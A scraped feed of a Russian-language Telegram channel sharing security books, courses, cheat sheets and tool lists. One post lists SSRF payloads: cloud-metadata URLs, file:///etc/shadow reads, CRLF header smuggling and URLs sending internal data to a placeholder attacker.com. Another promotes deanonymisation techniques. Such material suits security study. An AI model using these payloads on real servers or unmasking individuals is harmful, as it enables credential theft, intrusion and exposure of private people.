Архив Безопасника
10.9K subscribers
616 photos
68 videos
356 files
668 links
Материалы по хакингу и информационной безопасности со всего интернета.

Сотрудничество: @workhouse_price

РКН: https://clck.ru/3MENGA
Download Telegram
👀 OSINT: Поиск по интернету вещей, IP, доменам и поддоменам

Shodan – знаменитая поисковая система для сбора информации об устройствах, подключенных к интернету.
Censys Search, GreyNoise, ZoomEye, Netlas, CriminalIp – аналогичные Shodan поисковые системы, ориентированные на IoT.
Buckets by Grayhatwarfar – база данных с общедоступным поиском по открытым AWS Buckets, Azure Blobs, Digital Ocean Spaces.
Public buckets – поиск общедоступных бакетам AWS S3 & Azure Blob.
macaddress.io, MAC Vendor Lookup, maclookup.app –определяют производителя устройства по MAC-адресу, OUI или IAB.

🔥 – если хотите больше таких подборок

Secure Books
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥422
C# глазами хакера.zip
14.1 MB
👁 C# глазами хакера

Подробно рассмотрены все аспекты безопасности от теории до реальных реализаций .NET-приложений на языке C#


Перечислены уязвимости, которые могут быть присущи веб-сайтам и Web API, описано, как хакеры могут эксплуатировать уязвимости и как можно обеспечить безопасность приложений

Рассмотрены сетевые функции: проверка соединения, отслеживание запроса, доступ к микросервисам, работа с сокетами и др.

Приведены реальные примеры атак хакеров и способы защиты от них

Автор: Фленов М.
Год выхода: 2022

Secure Books
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9👍4😈1
Основы_криптографии_и_подстановочные_шифры_zip.003
1.4 GB
📖 Криптография и шифры: основы

В курсе вы научитесь:
Основным подходам, методам и алгоритмам современной криптографии.
Некоторым криптографическим шифровальным системам, основанным на подстановке символов открытого алфавита для получения шифроалфавита.
Узнаете про самые первые шифры, появляющиеся на протяжении всей истории человечества.
Основным криптографическим шифрам подстановки и принципам их построения и сможете применять распространенные криптографические шифры на практике.

Удаляете и открываете как zip; 002 и другие оставляете в той же папке что и тот что открываете

Secure Books
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥12👍3🦄1
List of Ransomware HD.png
643.5 KB
📄 Шпаргалка по Ransomware

Ransomware (вирус-шифровальщик, вирус-вымогатель)
– это вредоносная программа, которая при попадании на компьютер атакует важнейшие системные разделы с документами, таблицами, изображениями и пр.

Затем вирус шифрует все файлы этого типа и лишает владельца доступа к ним

Злоумышленники предлагают жертве заплатить деньги за восстановление доступа к данным

Secure Books
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11👍42👾1
😈 5 часто используемых SSRF нагрузок

SSRF (Server-Side Request Forgery)
– это уязвимость веб-приложения, которая позволяет злоумышленнику отправлять поддельные запросы от имени самого сервера

Пейлоады SSRF представляют собой специально сформированные запросы, которые злоумышленник внедряет в уязвимое веб-приложение


SSRF пейлоады могут включать
манипуляции с URL-адресами, использование специальных схем (например, file://, ftp://), эксплойты протокольного smuggling, обращения к метаданным облачных провайдеров и другие техники для достижения своих целей

1. Сканирование внутренней сети
Получение метаданных с инстансов AWS EC2:
http://169.254.169.254/latest/meta-data/

Получение метаданных с инстансов Google Cloud:
http://metadata.google.internal/computeMetadata/v1/instance/

Получение метаданных с инстансов Azure:
http://169.254.169.254/metadata/v1/

2. Получение файлов
Получение содержимого файла /etc/passwd:
file:///etc/passwd

Получение содержимого файла /etc/shadow (если доступно):
file:///etc/shadow

Получение содержимого файла boot.ini (Windows):
file:///c:/boot.ini


3. Взаимодействие с внешними сервисами
Получение содержимого внутреннего сайта и отправка его на сервер злоумышленника:
http://attacker.com/?url=http://internal.site.com/

Попытка подключиться к FTP-серверу, управляемому злоумышленником:
ftp://attacker.com/


4. Протокольный smuggling
Использование протокольного smuggling для изменения заголовка Host:
http://internal.site.com:80%0d%0aHost: attacker.com%0d%0a

Добавление фрагмента URL для обмана сервера, чтобы он подумал, что запрос предназначен для attacker.com:
http://internal.site.com:80%23attacker.com


5. Эксфильтрация данных через DNS
Использование DNS-запроса для передачи данных на сервер, контролируемый злоумышленником:
http://attacker.com/?url=http://x.x.x.x/

Использование поддомена для эксфильтрации данных на сервер злоумышленника:
http://attacker.com/?url=http://attacker.com.x.x.x.x.evilsite.com/


👀 Источник

Secure Books
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7🔥53
Криптографические_методы_защиты_информации.pdf
9.5 MB
🔒 Криптографические методы защиты информации

В настоящем пособии рассмотрены только основные математические методы защиты информации, и среди них главный акцент сделан на криптографическую защиту, которая включает:
симметричные и несимметричные методы шифрования
формирование секретных ключей
протоколы ограничения доступа и аутентификации сообщений и пользователей

Кроме того, в пособии рассматриваются типовые уязвимости операционных и информационно вычислительных систем

Авторы: Владимиров С. М.
Габидулин Э. М.
Колыбельников А. И.
Кшевецкий А. С.
Год выхода: 2020

Secure Books
Please open Telegram to view this post
VIEW IN TELEGRAM
👍162🦄2
🥷 Инструменты для деанонимизации: обзор программного обеспечения и методик

В статье автор поделиться своим опытом и знаниями о том, как можно раскрыть личность человека в интернете, используя различные техники и программы

Деанонимизация – это процесс, при котором анонимный пользователь или группа пользователей становятся известными по своим реальным данным, таким как имя, адрес, номер телефона, электронная почта и т.д.


Существует множество инструментов и методик для деанонимизации, которые можно разделить на несколько категорий:
Анализ данных
Анализ социальных сетей
Анализ текста
Анализ изображений

В статье подробно рассмотрим каждую из категорий

👀 Источник

Secure Books
Please open Telegram to view this post
VIEW IN TELEGRAM
👍11🔥5
Часть 6.zip
1.8 GB
📺 Курс: Тестирование на проникновение сайта

Комплексный курс по взлому веб-сайтов и веб-приложений от Зайда Сабиха, в русской озвучке! Материал подойдёт как для специалистов, так и для начинающих, которые лишь начинают свой путь в тестировании на проникновение и хакинге.

Secure Books
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥15👍7
📂 Awesome Shell

Список потрясающих фреймворков командной строки, наборов инструментов, руководств, шпаргалок, утилит, серверов и других полезных вещей

👀 Источник

Secure Books
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7🔥3
40 книг по Linux.7z
796.7 MB
😁 Топ 40 книг по Linux

Командная строка Linux. Полное руководство - 2017
Ubuntu и Debian Linux для продвинутых - 2011
Внутреннее устройство Linux - 2016
Linux на практике - 2017
UNIX. Профессиональное программирование - 2018
Linux глазами хакера 2019
Внутреннее устройство Linux 2017
Сценарии командной оболочки. Linux, OS X и Unix 2017
Встраиваемые системы на основе Linux 2017
Linux API. Исчерпывающее руководство 2018
Linux. От новичка к профессионалу 2018
Kali Linux от разработчиков 2019
Командная строка Linux. Полное руководство 2 изд 2020…

Secure Book
Please open Telegram to view this post
VIEW IN TELEGRAM
👍20🔥7💩2
😁 Лучшие инструменты аудита безопасности Linux

В сегодняшней  статье мы познакомим вас с лучшими утилитами аудита безопасности Linux

Lynis – самая навороченная тулза для аудита Linux-систем, при этом она довольно простая в использовании и очень наглядная – все тесты и их отчеты выводятся на экран. Утилита сканирует настройки текущего уровня безопасности и определяет состояние защищенности (hardening state) хоста

Lunar – это набор нативных скриптов, написанных на языке командной оболочки bash, которые тестируют целевую Linux-машину и генерируют по результатам проверки заключение аудита безопасности.
Инструмент основан на стандартах CIS и других мировых фреймворках по безопасности

Nix Auditor – это очередной скрипт для проверки, соответствует ли безопасность Linux-систем требованиям показателя CIS

Утилита Loki – не совсем классический инструмент для проведения аудита Linux, но он отлично подходит для поиска следов взлома, что является форензикой, но отчасти можно отнести и к практике аудита

👀 Источник

Secure Book
Please open Telegram to view this post
VIEW IN TELEGRAM
👍12
tcpdump HD.png
1.9 MB
📄 Шпаргалка по Tcpdump

Tcpdump – это утилита UNIX, позволяющая перехватывать и анализировать сетевой трафик, проходящий через компьютер, на котором запущена данная программа

Утилита имеет богатый набор опций и различных фильтров, благодаря чему её можно применять для различных целей

Secure Book
Please open Telegram to view this post
VIEW IN TELEGRAM
👍102🔥2
Bash и кибербезопасность.pdf
4.9 MB
☁️ Bash и кибербезопасность: атака, защита и анализ из командной строки Linux

Командная строка может стать идеальным инструментом для обеспечения кибербезопасности


Невероятная гибкость и абсолютная доступность превращают стандартный интерфейс командной строки (CLI) в фундаментальное решение, если у вас есть соответствующий опыт

Авторы Пол Тронкон и Карл Олбинг рассказывают об инструментах и хитростях командной строки, помогающих собирать данные при упреждающей защите, анализировать логи и отслеживать состояние сетей

Пентестеры узнают, как проводить атаки, используя колоссальный функционал, встроенный практически в любую версию Linux

Автор: Пол Тронкон, Карл Олбинг
Год выхода: 2020

Secure Book
Please open Telegram to view this post
VIEW IN TELEGRAM
👍164🔥2💅1
😁 Лучшие дистрибутивы Linux

Предлагаю Вам ознакомиться со списком самых лучших, популярных и интересных сборок Linux на данный момент

В статье мы подробно рассмотрим:
1. Топ-5 лучших дистрибутивов Linux на 2024 год
EndeavourOS
Mint
Ubuntu
Fedora
KDE neon
2. Лучшие дистрибутивы Linux на 2024 год для новичков
Zorin OS
Lite
Elementary OS
3. Лучшие дистрибутивы Linux на 2024 год для системных администраторов
MX Linux
Manjaro
Debian
4. Лучшие дистрибутивы Linux на 2024 год для гейминга
Garuda
Pop_OS!
Drauger OS
5. Лучшие дистрибутивы Linux на 2024 год для разработчиков
OpenSUSE
Kali
Puppy
Solus

👀 Источник

Secure Book
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥20🤡11🤮6👍4😁31🤔1